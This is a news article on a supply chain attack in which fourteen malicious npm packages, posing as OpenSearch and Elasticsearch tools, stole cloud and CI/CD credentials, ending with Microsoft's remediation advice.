Microsoft has discovered a new supply chain attack in which an attacker published fourteen malicious npm packages within a few hours. The packages masqueraded as tools for OpenSearch, Elasticsearch, and other widely used development environments, but were actually designed to steal sensitive credentials from cloud and CI/CD platforms.
According to Microsoft researchers, all packages appeared on May 28 under a newly created npm account. The attacker targeted developers working with services such as AWS, HashiCorp Vault, GitHub Actions, and npm itself. By posing as existing or related open-source projects, the attacker attempted to lure users into installing the software.
According to The Register, the attack fits into a broader trend in which cybercriminals use development environments as a point of entry. After all, access to CI/CD platforms and cloud accounts can lead to source code, corporate data, and production systems.
All fourteen packages contained the same malware. During installation, an initial program was automatically executed to gather information about the system. A second component was then loaded, specifically designed to steal login credentials, tokens, and other secrets from cloud and automation environments.
Microsoft warns that such attacks can extend beyond the originally infected systems. With stolen credentials, attackers can move laterally through an environment, collect additional data, and potentially even publish malicious updates via compromised developer accounts.
Deception via package names
To lure victims, the attacker used various techniques. Some packages employed typosquatting, where the name differed only slightly from a legitimate package. Others were given names strongly reminiscent of existing OpenSearch and Elasticsearch tools.
Additionally, metadata from real projects was copied. For example, links pointed to the websites, repositories, and bug trackers of existing open-source projects. The packages were also given strikingly high version numbers, making them appear at first glance to be software with a long development history.
The first variant of the attack utilized npm installation hooks. As soon as a developer installed the package, the malware collected information about the system, the user, and the Node.js environment, among other things. That data was sent to an external server, after which additional malware was downloaded.
A second generation of the attack operated more subtly. In this version, the malware first checked whether the Bun runtime was present. If not, a legitimate version of Bun was downloaded and used to execute the malicious code. This approach was intended to make the attack less conspicuous and reduce the likelihood of detection.
Packages Removed
Microsoft has since had the affected packages removed from the npm registry. The company advises organizations to check whether developers have installed or used any of the compromised packages in build processes since May 28.
If so, Microsoft recommends replacing all potentially compromised credentials. This includes AWS accounts, HashiCorp Vault tokens, npm publishing permissions, and GitHub Actions credentials.
The attack underscores once again how attractive open-source ecosystems have become to cybercriminals. By targeting developers and their software supply chains, attackers can gain access to much larger targets with relatively little effort.